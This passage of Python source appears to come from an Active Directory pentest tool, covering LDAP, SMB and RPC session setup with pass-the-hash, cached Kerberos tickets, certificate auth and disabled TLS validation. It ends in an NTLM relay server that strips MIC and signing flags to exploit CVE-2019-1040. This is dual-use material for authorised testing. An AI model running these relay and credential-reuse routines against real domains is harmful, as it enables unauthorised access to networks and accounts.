					target = host2ip(ldap_address, nameserver=self.nameserver, use_system_ns=self.use_system_ns)
				else:
					target = ldap_address
			elif self.ldap_address is not None:
				target = self.ldap_address
			else:
				target = self.domain

		if self.do_certificate:
			logging.debug("Using Schannel, trying to authenticate with provided certificate")

			try:
				key_file = tempfile.NamedTemporaryFile(delete=False)
				key_file.write(key_to_pem(self.key))
				key_file.close()
			except AttributeError as e:
				logging.error("Not a valid key file")
				sys.exit(0)

			try:
				cert_file = tempfile.NamedTemporaryFile(delete=False)
				cert_file.write(cert_to_pem(self.cert))
				cert_file.close()
			except AttributeError as e:
				logging.error(str(e))
				sys.exit(0)
			
			logging.debug(f"Key File: {key_file.name}")
			logging.debug(f"Cert File: {cert_file.name}")
			tls = ldap3.Tls(
					local_private_key_file=key_file.name,
					local_certificate_file=cert_file.name,
					validate=ssl.CERT_NONE,
				)
			self.ldap_server, self.ldap_session = self.init_ldap_schannel_connection(target, tls)
			#self.ldap_server, self.ldap_session = self.init_ldap_connection(target, tls, auth_method=ldap3.SASL)
			return self.ldap_server, self.ldap_session

		_anonymous = False
		if not self.domain and not self.username and (not self.password or not self.nthash or not self.lmhash):
			if self.relay:
				target = "ldaps://%s" % (self.ldap_address) if self.use_ldaps else "ldap://%s" % (self.ldap_address)
				logging.info(f"Targeting {target}")

				relay = Relay(target, self.relay_host, self.relay_port, self.args)
				relay.start()

				self.ldap_session = relay.get_ldap_session()
				self.ldap_server = relay.get_ldap_server()
				self.proto = relay.get_scheme()

				# setting back to default
				self.relay = False

				return self.ldap_server, self.ldap_session
			else:
				logging.debug("No credentials supplied. Using ANONYMOUS access")
				_anonymous = True
		else:
			if self.relay:
				logging.warning("Credentials supplied with relay option. Ignoring relay flag...")

		if self.use_ldaps is True or self.use_gc_ldaps is True:
			try:
				tls = ldap3.Tls(
					validate=ssl.CERT_NONE,
					version=ssl.PROTOCOL_TLSv1_2,
					ciphers='ALL:@SECLEVEL=0',
				)
				if _anonymous:
					self.ldap_server, self.ldap_session = self.init_ldap_anonymous(target, tls)
				else:
					self.ldap_server, self.ldap_session = self.init_ldap_connection(target, tls, self.domain, self.username, self.password, self.lmhash, self.nthash, auth_method=self.auth_method)

				# check if domain is empty
				if not self.domain or not is_valid_fqdn(self.domain):
					self.refresh_domain()

				return self.ldap_server, self.ldap_session
			except (ldap3.core.exceptions.LDAPSocketOpenError, ConnectionResetError):
				try:
					tls = ldap3.Tls(
						validate=ssl.CERT_NONE,
						version=ssl.PROTOCOL_TLSv1,
						ciphers='ALL:@SECLEVEL=0',
					)
					if _anonymous:
						self.ldap_server, self.ldap_session = self.init_ldap_anonymous(target, tls)
					else:
						self.ldap_server, self.ldap_session = self.init_ldap_connection(target, tls, self.domain, self.username, self.password, self.lmhash, self.nthash, auth_method=self.auth_method)
					return self.ldap_server, self.ldap_session
				except:
					if self.use_ldaps:
						logging.debug('Error bind to LDAPS, trying LDAP')
						self.use_ldap = True
						self.use_ldaps = False
					elif self.use_gc_ldaps:
						logging.debug('Error bind to GS ssl, trying GC')
						self.use_gc = True
						self.use_gc_ldaps = False
					return self.init_ldap_session()
		else:
			if _anonymous:
				self.ldap_server, self.ldap_session = self.init_ldap_anonymous(target)
			else:
				self.ldap_server, self.ldap_session = self.init_ldap_connection(target, None, self.domain, self.username, self.password, self.lmhash, self.nthash, auth_method=self.auth_method)
			return self.ldap_server, self.ldap_session

	def init_ldap_anonymous(self, target, tls=None):
		ldap_server_kwargs = {
			"host": target,
			"get_info": ldap3.ALL,
			"formatter": {
				"sAMAccountType": LDAP.resolve_samaccounttype,
				"lastLogon": LDAP.ldap2datetime,
				"whenCreated": LDAP.resolve_generalized_time,
				"whenChanged": LDAP.resolve_generalized_time,
				"pwdLastSet": LDAP.ldap2datetime,
				"badPasswordTime": LDAP.ldap2datetime,
				"lastLogonTimestamp": LDAP.ldap2datetime,
				"objectGUID": LDAP.bin_to_guid,
				"objectSid": LDAP.bin_to_sid,
				"securityIdentifier": LDAP.bin_to_sid,
				"mS-DS-CreatorSID": LDAP.bin_to_sid,
				"msDS-ManagedPassword": LDAP.formatGMSApass,
				"pwdProperties": LDAP.resolve_pwdProperties,
				"userAccountControl": LDAP.resolve_uac,
				"msDS-SupportedEncryptionTypes": LDAP.resolve_enc_type,
				"trustAttributes": TRUST.resolve_trustAttributes,
				"trustType": TRUST.resolve_trustType,
				"trustDirection": TRUST.resolve_trustDirection
			}
		}

		if tls:
			if self.use_ldaps:
				self.proto = "LDAPS"
				ldap_server_kwargs["use_ssl"] = True
				ldap_server_kwargs["port"] = 636
			elif self.use_gc_ldaps:
				self.proto = "GCssl"
				ldap_server_kwargs["use_ssl"] = True
				ldap_server_kwargs["port"] = 3269
		else:
			if self.use_gc:
				self.proto = "GC"
				ldap_server_kwargs["use_ssl"] = False
				ldap_server_kwargs["port"] = 3268
			elif self.use_ldap:
				self.proto = "LDAP"
				ldap_server_kwargs["use_ssl"] = False
				ldap_server_kwargs["port"] = 389

		logging.debug(f"Connecting as ANONYMOUS to %s, Port: %s, SSL: %s" % (ldap_server_kwargs["host"], ldap_server_kwargs["port"], ldap_server_kwargs["use_ssl"]))
		self.ldap_server = ldap3.Server(**ldap_server_kwargs)
		self.ldap_session = ldap3.Connection(self.ldap_server)

		if not self.ldap_session.bind():
			logging.info(f"Error binding to {self.proto}")
			sys.exit(0)

		base_dn = self.ldap_server.info.other['defaultNamingContext'][0]
		self.domain = dn2domain(self.ldap_server.info.other['defaultNamingContext'][0])
		if not self.ldap_session.search(base_dn,'(objectclass=*)'):
			logging.warning("ANONYMOUS access not allowed for %s" % (self.domain))
			sys.exit(0)
		else:
			logging.info("Server allows ANONYMOUS access!")
			
			# check if domain is empty
			if not self.domain or not is_valid_fqdn(self.domain):
				self.domain = dn2domain(ldap_server.info.other.get('rootDomainNamingContext')[0])
				self.username = "ANONYMOUS"
			
			return ldap_server, ldap_session

	def init_ldap_schannel_connection(self, target, tls, seal_and_sign=False, tls_channel_binding=False):
		ldap_server_kwargs = {
			"host": target,
			"get_info": ldap3.ALL,
			"use_ssl": True if self.use_gc_ldaps or self.use_ldaps else False,
			"tls": tls,
			"port": self.port,
			"formatter": {
				"sAMAccountType": LDAP.resolve_samaccounttype,
				"lastLogon": LDAP.ldap2datetime,
				"whenCreated": LDAP.resolve_generalized_time,
				"whenChanged": LDAP.resolve_generalized_time,
				"pwdLastSet": LDAP.ldap2datetime,
				"badPasswordTime": LDAP.ldap2datetime,
				"lastLogonTimestamp": LDAP.ldap2datetime,
				"objectGUID": LDAP.bin_to_guid,
				"objectSid": LDAP.bin_to_sid,
				"securityIdentifier": LDAP.bin_to_sid,
				"mS-DS-CreatorSID": LDAP.bin_to_sid,
				"msDS-ManagedPassword": LDAP.formatGMSApass,
				"msDS-GroupMSAMembership": LDAP.parseGMSAMembership,
				"pwdProperties": LDAP.resolve_pwdProperties,
				"userAccountControl": LDAP.resolve_uac,
				"msDS-SupportedEncryptionTypes": LDAP.resolve_enc_type,
				"trustAttributes": TRUST.resolve_trustAttributes,
				"trustType": TRUST.resolve_trustType,
				"trustDirection": TRUST.resolve_trustDirection
			}
		}

		if self.use_ldaps:
			self.proto = "LDAPS"
			ldap_server_kwargs["use_ssl"] = True
			ldap_server_kwargs["port"] = 636 if not self.port else self.port
		elif self.use_gc_ldaps:
			self.proto = "GCssl"
			ldap_server_kwargs["use_ssl"] = True
			ldap_server_kwargs["port"] = 3269 if not self.port else self.port

		ldap_connection_kwargs = {
			"user": None,
			"authentication": ldap3.SASL,
			"sasl_mechanism": ldap3.EXTERNAL,
		}

		ldap_server = ldap3.Server(**ldap_server_kwargs)
		try:
			if seal_and_sign or self.use_sign_and_seal:
				logging.debug("Using seal and sign")
				ldap_connection_kwargs["session_security"] = ldap3.ENCRYPT
			elif tls_channel_binding or self.use_channel_binding:
				logging.debug("Using channel binding")
				ldap_connection_kwargs["channel_binding"] = ldap3.TLS_CHANNEL_BINDING
			
			ldap_session = ldap3.Connection(ldap_server, raise_exceptions=True, **ldap_connection_kwargs)
			ldap_session.open()
		except Exception as e:
			logging.error("Error during schannel authentication with error: %s", str(e))
			sys.exit(0)
		except ldap3.core.exceptions.LDAPInvalidCredentialsResult as e:
			logging.debug("Server returns invalidCredentials")
			if 'AcceptSecurityContext error, data 80090346' in str(ldap_session.result):
				logging.warning("Channel binding is enforced!")
				if self.tls_channel_binding_supported and (self.use_ldaps or self.use_gc_ldaps):
					logging.debug("Re-authenticate with channel binding")
					return self.init_ldap_schannel_connection(target, tls, tls_channel_binding=True)
				else:
					logging.warning('ldap3 library doesn\'t support CB. Install with "pip install \"git+https://github.com/H0j3n/ldap3.git@powerview.py_match-requirements\""')
					sys.exit(-1)
		except ldap3.core.exceptions.LDAPStrongerAuthRequiredResult as e:
			logging.debug("Server returns LDAPStrongerAuthRequiredResult")
			logging.warning("LDAP Signing is enforced!")
			if self.sign_and_seal_supported:
				logging.debug("Re-authenticate with seal and sign")
				return self.init_ldap_schannel_connection(target, tls, seal_and_sign=True)
			else:
				logging.warning('ldap3 library doesn\'t support CB. Install with "pip install \"git+https://github.com/H0j3n/ldap3.git@powerview.py_match-requirements\""')
				sys.exit(-1)
		except ldap3.core.exceptions.LDAPInappropriateAuthenticationResult as e:
			logging.error("Cannot start kerberos signing/sealing when using TLS/SSL")
			sys.exit(-1)
		except ldap3.core.exceptions.LDAPInvalidValueError as e:
			logging.error(str(e))
			sys.exit(-1)
		
		if ldap_session.result is not None:
			logging.error(f"AuthError: {str(ldap_session.result['message'])}")
			sys.exit(0)

		# check if domain is empty
		self.domain = dn2domain(ldap_server.info.other.get('rootDomainNamingContext')[0])
		who_am_i = ldap_session.extend.standard.who_am_i().lstrip("u:").split("\\")
		self.username = who_am_i[-1]
		self.flatname = who_am_i[0]

		return ldap_server, ldap_session

	def init_ldap_connection(self, target, tls, domain=None, username=None, password=None, lmhash=None, nthash=None, seal_and_sign=False, tls_channel_binding=False, auth_method=ldap3.NTLM):
		ldap_server_kwargs = {
			"host": target,
			"get_info": ldap3.ALL,
			"allowed_referral_hosts": [('*', True)],
			"mode": ldap3.IP_V4_PREFERRED,
			"formatter": {
				"sAMAccountType": LDAP.resolve_samaccounttype,
				"lastLogon": LDAP.ldap2datetime,
				"whenCreated": LDAP.resolve_generalized_time,
				"whenChanged": LDAP.resolve_generalized_time,
				"pwdLastSet": LDAP.ldap2datetime,
				"badPasswordTime": LDAP.ldap2datetime,
				"lastLogonTimestamp": LDAP.ldap2datetime,
				"objectGUID": LDAP.bin_to_guid,
				"objectSid": LDAP.bin_to_sid,
				"securityIdentifier": LDAP.bin_to_sid,
				"mS-DS-CreatorSID": LDAP.bin_to_sid,
				"msDS-ManagedPassword": LDAP.formatGMSApass,
				"msDS-GroupMSAMembership": LDAP.parseGMSAMembership,
				"pwdProperties": LDAP.resolve_pwdProperties,
				"userAccountControl": LDAP.resolve_uac,
				"msDS-SupportedEncryptionTypes": LDAP.resolve_enc_type,
				"trustAttributes": TRUST.resolve_trustAttributes,
				"trustType": TRUST.resolve_trustType,
				"trustDirection": TRUST.resolve_trustDirection
			}
		}

		if tls:
			if self.use_ldaps:
				self.proto = "LDAPS"
				ldap_server_kwargs["use_ssl"] = True
				ldap_server_kwargs["port"] = 636 if not self.port else self.port
			elif self.use_gc_ldaps:
				self.proto = "GCssl"
				ldap_server_kwargs["use_ssl"] = True
				ldap_server_kwargs["port"] = 3269 if not self.port else self.port
		else:
			if self.use_gc:
				self.proto = "GC"
				ldap_server_kwargs["use_ssl"] = False
				ldap_server_kwargs["port"] = 3268 if not self.port else self.port
			elif self.use_ldap:
				self.proto = "LDAP"
				ldap_server_kwargs["use_ssl"] = False
				ldap_server_kwargs["port"] = 389 if not self.port else self.port

		# TODO: fix target when using kerberos
		bind = False

		ldap_server = ldap3.Server(**ldap_server_kwargs)

		user = None
		if auth_method == ldap3.NTLM:
			user = '%s\\%s' % (domain, username)
		elif auth_method == ldap3.SIMPLE:
			user = '{}@{}'.format(username, domain)

		ldap_connection_kwargs = {
			"user":user,
			"raise_exceptions": True,
			"authentication": auth_method
		}
		logging.debug("Authentication: {}, User: {}".format(auth_method, user))

		if seal_and_sign or self.use_sign_and_seal:
			logging.debug("Using seal and sign")
			ldap_connection_kwargs["session_security"] = ldap3.ENCRYPT
		elif tls_channel_binding or self.use_channel_binding:
			logging.debug("Using channel binding")
			ldap_connection_kwargs["channel_binding"] = ldap3.TLS_CHANNEL_BINDING

		logging.debug(f"Connecting to %s, Port: %s, SSL: %s" % (ldap_server_kwargs["host"], ldap_server_kwargs["port"], ldap_server_kwargs["use_ssl"]))
		if self.use_kerberos:
			ldap_session = ldap3.Connection(ldap_server, auto_referrals=False)
			bind = ldap_session.bind()
			try:
				self.ldap3_kerberos_login(ldap_session, target, username, password, domain, lmhash, nthash, self.auth_aes_key, kdcHost=self.kdcHost, useCache=self.no_pass)
			except Exception as e:
				logging.error(str(e))
				sys.exit(0)
		else:
			if self.hashes is not None:
				ldap_connection_kwargs["password"] = '{}:{}'.format(lmhash, nthash)
			elif password is not None:
				ldap_connection_kwargs["password"] = password
			
			try:
				ldap_session = ldap3.Connection(ldap_server, **ldap_connection_kwargs)
				bind = ldap_session.bind()
			except ldap3.core.exceptions.LDAPInvalidCredentialsResult as e:
				logging.debug("Server returns invalidCredentials")
				if 'AcceptSecurityContext error, data 80090346' in str(ldap_session.result):
					logging.warning("Channel binding is enforced!")
					if self.tls_channel_binding_supported and (self.use_ldaps or self.use_gc_ldaps):
						logging.debug("Re-authenticate with channel binding")
						return self.init_ldap_connection(target, tls, domain, username, password, lmhash, nthash, tls_channel_binding=True, auth_method=self.auth_method)
					else:
						if lmhash and nthash:
							sys.exit(-1)
						else:
							logging.info("Falling back to SIMPLE authentication")
							return self.init_ldap_connection(target, tls, domain, username, password, lmhash, nthash, auth_method=ldap3.SIMPLE)
			except ldap3.core.exceptions.LDAPStrongerAuthRequiredResult as e:
				logging.debug("Server returns LDAPStrongerAuthRequiredResult")
				logging.warning("LDAP Signing is enforced!")
				if self.sign_and_seal_supported:
					logging.debug("Re-authenticate with seal and sign")
					return self.init_ldap_connection(target, tls, domain, username, password, lmhash, nthash, seal_and_sign=True, auth_method=self.auth_method)
				else:
					sys.exit(-1)
			except ldap3.core.exceptions.LDAPInappropriateAuthenticationResult as e:
				logging.error("Cannot start kerberos signing/sealing when using TLS/SSL")
				sys.exit(-1)
			except ldap3.core.exceptions.LDAPInvalidValueError as e:
				logging.error(str(e))
				sys.exit(-1)
			except ldap3.core.exceptions.LDAPOperationsErrorResult as e:
				logging.error("Failed to bind with error: %s" % (str(e)))
				sys.exit(-1)

			if not bind:
				error_code = ldap_session.result['message'].split(",")[2].replace("data","").strip()
				error_status = LDAP.resolve_err_status(error_code)
				if error_code and error_status:
					logging.error("Bind not successful - %s [%s]" % (ldap_session.result['description'], error_status))
					logging.debug("%s" % (ldap_session.result['message']))
				else:
					logging.error(f"Unexpected Error: {str(ldap_session.result['message'])}")

				sys.exit(0)
			else:
				logging.debug("Bind SUCCESS!")

		# check if domain is empty
		if not self.domain or not is_valid_fqdn(self.domain):
			self.domain = dn2domain(ldap_server.info.other.get('rootDomainNamingContext')[0])
		
		who_am_i = ldap_session.extend.standard.who_am_i().lstrip("u:").split("\\")
		self.username = who_am_i[-1]
		self.flatname = who_am_i[0]
		return ldap_server, ldap_session

	def ldap3_kerberos_login(self, connection, target, user, password, domain='', lmhash='', nthash='', aesKey='', kdcHost=None, TGT=None, TGS=None, useCache=True):
		from pyasn1.codec.ber import encoder, decoder
		from pyasn1.type.univ import noValue
		from binascii import hexlify, unhexlify
		"""
		logins into the target system explicitly using Kerberos. Hashes are used if RC4_HMAC is supported.
		:param string user: username
		:param string password: password for the user
		:param string domain: domain where the account is valid for (required)
		:param string lmhash: LMHASH used to authenticate using hashes (password is not used)
		:param string nthash: NTHASH used to authenticate using hashes (password is not used)
		:param string aesKey: aes256-cts-hmac-sha1-96 or aes128-cts-hmac-sha1-96 used for Kerberos authentication
		:param string kdcHost: hostname or IP Address for the KDC. If None, the domain will be used (it needs to resolve tho)
		:param struct TGT: If there's a TGT available, send the structure here and it will be used
		:param struct TGS: same for TGS. See smb3.py for the format
		:param bool useCache: whether or not we should use the ccache for credentials lookup. If TGT or TGS are specified this is False
		:return: True, raises an Exception if error.
		"""

		if lmhash != '' or nthash != '':
			if len(lmhash) % 2:
				lmhash = '0' + lmhash
			if len(nthash) % 2:
				nthash = '0' + nthash
			try:  # just in case they were converted already
				lmhash = unhexlify(lmhash)
				nthash = unhexlify(nthash)
			except TypeError:
				pass

		# Importing down here so pyasn1 is not required if kerberos is not used.
		from impacket.krb5.ccache import CCache
		from impacket.krb5.asn1 import AP_REQ, Authenticator, TGS_REP, seq_set
		from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS
		from impacket.krb5 import constants
		from impacket.krb5.types import Principal, KerberosTime, Ticket
		import datetime
		import os

		if self.TGT or self.TGS:
			useCache = False

		if useCache:
			try:
				env_krb5ccname = os.getenv('KRB5CCNAME')
				if not env_krb5ccname:
					logging.error("No KRB5CCNAME environment present.")
					sys.exit(0)
				ccache = CCache.loadFile(env_krb5ccname)
			except Exception as e:
				# No cache present
				print(e)
				pass
			else:
				# retrieve domain information from CCache file if needed
				if domain == '':
					domain = ccache.principal.realm['data'].decode('utf-8')
					logging.debug('Domain retrieved from CCache: %s' % domain)

				logging.debug('Using Kerberos Cache: %s' % os.getenv('KRB5CCNAME'))
				principal = 'ldap/%s@%s' % (target.upper(), domain.upper())

				creds = ccache.getCredential(principal)
				if creds is None:
					# Let's try for the TGT and go from there
					principal = 'krbtgt/%s@%s' % (domain.upper(), domain.upper())
					creds = ccache.getCredential(principal)
					if creds is not None:
						self.TGT = creds.toTGT()
						logging.debug('Using TGT from cache')
					else:
						logging.debug('No valid credentials found in cache')
				else:
					self.TGS = creds.toTGS(principal)
					logging.debug('Using TGS from cache')

				# retrieve user information from CCache file if needed
				if user == '' and creds is not None:
					user = creds['client'].prettyPrint().split(b'@')[0].decode('utf-8')
					logging.debug('Username retrieved from CCache: %s' % user)
				elif user == '' and len(ccache.principal.components) > 0:
					user = ccache.principal.components[0]['data'].decode('utf-8')
					logging.debug('Username retrieved from CCache: %s' % user)

		# First of all, we need to get a TGT for the user
		userName = Principal(user, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
		if not self.TGT:
			self.TGT = dict()
			if not self.TGS:
				tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, password, domain, lmhash, nthash, aesKey, kdcHost)
				self.TGT['KDC_REP'] = tgt
				self.TGT['cipher'] = cipher
				self.TGT['oldSessionKey'] = oldSessionKey
				self.TGT['sessionKey'] = sessionKey
		else:
			tgt = self.TGT['KDC_REP']
			cipher = self.TGT['cipher']
			sessionKey = self.TGT['sessionKey']

		if not self.TGS:
			self.TGS = dict()
			serverName = Principal('ldap/%s' % target, type=constants.PrincipalNameType.NT_SRV_INST.value)
			tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, domain, kdcHost, tgt, cipher, sessionKey)
			self.TGS['KDC_REP'] = tgs
			self.TGS['cipher'] = cipher
			self.TGS['oldSessionKey'] = oldSessionKey
			self.TGS['sessionKey'] = sessionKey
		else:
			tgs = self.TGS['KDC_REP']
			cipher = self.TGS['cipher']
			sessionKey = self.TGS['sessionKey']

			# Let's build a NegTokenInit with a Kerberos REQ_AP

		blob = SPNEGO_NegTokenInit()

		# Kerberos
		blob['MechTypes'] = [TypesMech['MS KRB5 - Microsoft Kerberos 5']]

		# Let's extract the ticket from the TGS
		tgs = decoder.decode(tgs, asn1Spec=TGS_REP())[0]
		ticket = Ticket()
		ticket.from_asn1(tgs['ticket'])

		# Now let's build the AP_REQ
		apReq = AP_REQ()
		apReq['pvno'] = 5
		apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value)

		opts = []
		apReq['ap-options'] = constants.encodeFlags(opts)
		seq_set(apReq, 'ticket', ticket.to_asn1)

		authenticator = Authenticator()
		authenticator['authenticator-vno'] = 5
		authenticator['crealm'] = domain
		seq_set(authenticator, 'cname', userName.components_to_asn1)
		now = datetime.datetime.utcnow()

		authenticator['cusec'] = now.microsecond
		authenticator['ctime'] = KerberosTime.to_asn1(now)

		encodedAuthenticator = encoder.encode(authenticator)

		# Key Usage 11
		# AP-REQ Authenticator (includes application authenticator
		# subkey), encrypted with the application session key
		# (Section 5.5.1)
		encryptedEncodedAuthenticator = cipher.encrypt(sessionKey, 11, encodedAuthenticator, None)

		apReq['authenticator'] = noValue
		apReq['authenticator']['etype'] = cipher.enctype
		apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator

		blob['MechToken'] = encoder.encode(apReq)

		request = ldap3.operation.bind.bind_operation(connection.version, ldap3.SASL, user, None, 'GSS-SPNEGO',
													  blob.getData())

		# Done with the Kerberos saga, now let's get into LDAP
		if connection.closed:  # try to open connection if closed
			connection.open(read_server_info=False)

		connection.sasl_in_progress = True
		response = connection.post_send_single_response(connection.send('bindRequest', request, None))
		connection.sasl_in_progress = False
		if response[0]['result'] != 0:
			raise Exception(response)

		connection.bound = True

		return True

	def init_smb_session(self, host, timeout=10, useCache=True):
		try:
			logging.debug("Default timeout is set to 15. Expect a delay")
			conn = SMBConnection(host, host, sess_port=445, timeout=timeout)
			if self.use_kerberos:
				if self.TGT and self.TGS:
					useCache = False

				if useCache:
					# only import if used
					import os
					from impacket.krb5.ccache import CCache
					from impacket.krb5.kerberosv5 import KerberosError
					from impacket.krb5 import constants

					try:
						ccache = CCache.loadFile(os.getenv('KRB5CCNAME'))
					except Exception as e:
					   # No cache present
						logging.info(str(e))
						return
					else:
						# retrieve domain information from CCache file if needed
						if self.domain == '':
							self.domain = ccache.principal.realm['data'].decode('utf-8')
							logging.debug('Domain retrieved from CCache: %s' % domain)

						logging.debug('Using Kerberos Cache: %s' % os.getenv('KRB5CCNAME'))
						principal = 'cifs/%s@%s' % (self.targetIp.upper(), self.domain.upper())

						creds = ccache.getCredential(principal)
						if creds is None:
							# Let's try for the TGT and go from there
							principal = 'krbtgt/%s@%s' % (self.domain.upper(), self.domain.upper())
							creds = ccache.getCredential(principal)
							if creds is not None:
								self.TGT = creds.toTGT()
								logging.debug('Using TGT from cache')
							else:
								logging.debug('No valid credentials found in cache')
						else:
							self.TGS = creds.toTGS(principal)
							logging.debug('Using TGS from cache')

						# retrieve user information from CCache file if needed
						if self.username == '' and creds is not None:
							self.username = creds['client'].prettyPrint().split(b'@')[0].decode('utf-8')
							logging.debug('Username retrieved from CCache: %s' % self.username)
						elif self.username == '' and len(ccache.principal.components) > 0:
							self.user = ccache.principal.components[0]['data'].decode('utf-8')
							logging.debug('Username retrieved from CCache: %s' % self.username)
				
				conn.kerberosLogin(self.username,self.password,self.domain, self.lmhash, self.nthash, self.auth_aes_key, self.dc_ip, self.TGT, self.TGS)
				#conn.kerberosLogin(self.username,self.password,self.domain, self.lmhash, self.nthash, self.auth_aes_key, self.dc_ip, self.TGT, self.TGS)
				# havent support kerberos authentication yet
			else:
				conn.login(self.username,self.password,self.domain, self.lmhash, self.nthash)
			return conn
		except OSError as e:
			logging.debug(str(e))
			return None
		except SessionError as e:
			logging.debug(str(e))
			return None
		except AssertionError as e:
			logging.debug(str(e))
			return None

	def init_samr_session(self):
		if not self.samr:
			self.samr = self.connectSamr()
		return self.samr

	# TODO: FIX kerberos auth
	def connectSamr(self):
		rpctransport = transport.SMBTransport(self.dc_ip, filename=r'\samr')

		if hasattr(rpctransport, 'set_credentials'):
			rpctransport.set_credentials(self.username, self.password, self.domain, lmhash=self.lmhash, nthash=self.nthash, aesKey=self.auth_aes_key, TGT=self.TGT, TGS=self.TGS)

		rpctransport.set_kerberos(self.use_kerberos, kdcHost=self.kdcHost)

		try:
			dce = rpctransport.get_dce_rpc()
			if self.use_kerberos:
				dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
			dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
			dce.connect()
			dce.bind(samr.MSRPC_UUID_SAMR)
			return dce
		except:
			return None

	# stole from PetitPotam.py
	# TODO: FIX kerberos auth
	def connectRPCTransport(self, host=None, stringBindings=None, interface_uuid=None, port=445, auth=True, set_authn=False, raise_exceptions=False):
		if self.stack_trace:
			raise_exceptions = True

		if not host:
			host = self.dc_ip

		if not stringBindings:
			stringBindings = epm.hept_map(host, samr.MSRPC_UUID_SAMR, protocol ='ncacn_ip_tcp')

		logging.debug("[ConnectRPCTransport] Connecting to %s" % stringBindings)
		rpctransport = transport.DCERPCTransportFactory(stringBindings)
		rpctransport.set_dport(port)

		if hasattr(rpctransport, 'set_credentials') and auth:
			rpctransport.set_credentials(self.username, self.password, self.domain, self.lmhash, self.nthash, TGT=self.TGT)

		if hasattr(rpctransport, 'set_kerberos') and self.use_kerberos and auth:
			rpctransport.set_kerberos(self.use_kerberos, kdcHost=self.kdcHost)

		if host:
			rpctransport.setRemoteHost(host)

		dce = rpctransport.get_dce_rpc()

		if set_authn:
			dce.set_auth_type(RPC_C_AUTHN_WINNT)
			dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)

		logging.debug("[ConnectRPCTransport] Connecting to %s" % stringBindings)

		try:
			dce.connect()
			if interface_uuid:
				logging.debug("[connectRPCTransport] Binding to UUID %s" % interface_uuid)
				dce.bind(interface_uuid)
			return dce
		except SessionError as e:
			logging.debug("[connectRPCTransport:SessionError] %s" % str(e))
			if raise_exceptions:
				raise e
			else:
				return
		except Exception as e:
			logging.debug("[connectRPCTransport:Exception] %s" % str(e))
			if raise_exceptions:
				raise e
			else:
				return

	# stolen from pywerview
	def create_rpc_connection(self, host, pipe):
		binding_strings = dict()
		binding_strings['srvsvc'] = srvs.MSRPC_UUID_SRVS
		binding_strings['wkssvc'] = wkst.MSRPC_UUID_WKST
		binding_strings['samr'] = samr.MSRPC_UUID_SAMR
		binding_strings['svcctl'] = scmr.MSRPC_UUID_SCMR
		binding_strings['drsuapi'] = drsuapi.MSRPC_UUID_DRSUAPI

		# TODO: try to fallback to TCP/139 if tcp/445 is closed
		if pipe == r'\drsuapi':
			string_binding = epm.hept_map(host, drsuapi.MSRPC_UUID_DRSUAPI,
										  protocol='ncacn_ip_tcp')
			rpctransport = transport.DCERPCTransportFactory(string_binding)
			rpctransport.set_credentials(username=self.username, password=self.password,
										 domain=self.domain, lmhash=self.lmhash,
										 nthash=self.nthash, TGT=self.TGT, TGS=self.TGS)
		else:
			rpctransport = transport.SMBTransport(host, 445, pipe,
												  username=self.username, password=self.password,
												  domain=self.domain, lmhash=self.lmhash,
												  nthash=self.nthash, doKerberos=self.use_kerberos, TGT=self.TGT, TGS=self.TGS)

		rpctransport.set_connect_timeout(10)
		dce = rpctransport.get_dce_rpc()

		if pipe == r'\drsuapi':
			dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)

		try:
			dce.connect()
		except Exception as e:
			logging.critical('Error when creating RPC connection')
			logging.critical(e)
			self.rpc_conn = None
		else:
			dce.bind(binding_strings[pipe[1:]])
			self.rpc_conn = dce

		return self.rpc_conn

	def init_rpc_session(self, host, pipe=r'\srvsvc'):
		if not self.rpc_conn:
			return self.create_rpc_connection(host=host, pipe=pipe)
		else:
			return self.rpc_conn

class LDAPRelayServer(LDAPRelayClient):
	def initConnection(self):
		self.ldap_relay.scheme = "LDAP"
		self.server = ldap3.Server("ldap://%s:%s" % (self.targetHost, self.targetPort), get_info=ldap3.ALL)
		self.session = ldap3.Connection(self.server, user="a", password="b", authentication=ldap3.NTLM)
		self.session.open(False)
		return True

	def sendAuth(self, authenticateMessageBlob, serverChallenge=None):
		if unpack('B', authenticateMessageBlob[:1])[0] == SPNEGO_NegTokenResp.SPNEGO_NEG_TOKEN_RESP:
			respToken2 = SPNEGO_NegTokenResp(authenticateMessageBlob)
			token = respToken2['ResponseToken']
		else:
			token = authenticateMessageBlob

		authMessage = NTLMAuthChallengeResponse()
		authMessage.fromString(token)
		# When exploiting CVE-2019-1040, remove flags
		if self.serverConfig.remove_mic:
			if authMessage['flags'] & NTLMSSP_NEGOTIATE_SIGN == NTLMSSP_NEGOTIATE_SIGN:
				authMessage['flags'] ^= NTLMSSP_NEGOTIATE_SIGN
			if authMessage['flags'] & NTLMSSP_NEGOTIATE_ALWAYS_SIGN == NTLMSSP_NEGOTIATE_ALWAYS_SIGN:
				authMessage['flags'] ^= NTLMSSP_NEGOTIATE_ALWAYS_SIGN
			if authMessage['flags'] & NTLMSSP_NEGOTIATE_KEY_EXCH == NTLMSSP_NEGOTIATE_KEY_EXCH:
				authMessage['flags'] ^= NTLMSSP_NEGOTIATE_KEY_EXCH
			if authMessage['flags'] & NTLMSSP_NEGOTIATE_VERSION == NTLMSSP_NEGOTIATE_VERSION:
				authMessage['flags'] ^= NTLMSSP_NEGOTIATE_VERSION
			authMessage['MIC'] = b''
			authMessage['MICLen'] = 0
			authMessage['Version'] = b''
			authMessage['VersionLen'] = 0
			token = authMessage.getData()

		with self.session.connection_lock:
			self.authenticateMessageBlob = token
			request = bind.bind_operation(self.session.version, 'SICILY_RESPONSE_NTLM', self, None)
			response = self.session.post_send_single_response(self.session.send('bindRequest', request, None))
			result = response[0]
		self.session.sasl_in_progress = False

		if result['result'] == RESULT_SUCCESS:
			self.session.bound = True
			self.session.refresh_server_info()
			self.ldap_relay.ldap_server = self.server
			self.ldap_relay.ldap_session = self.session

			return None, STATUS_SUCCESS
		else:
			if result['result'] == RESULT_STRONGER_AUTH_REQUIRED and self.PLUGIN_NAME != 'LDAPS':
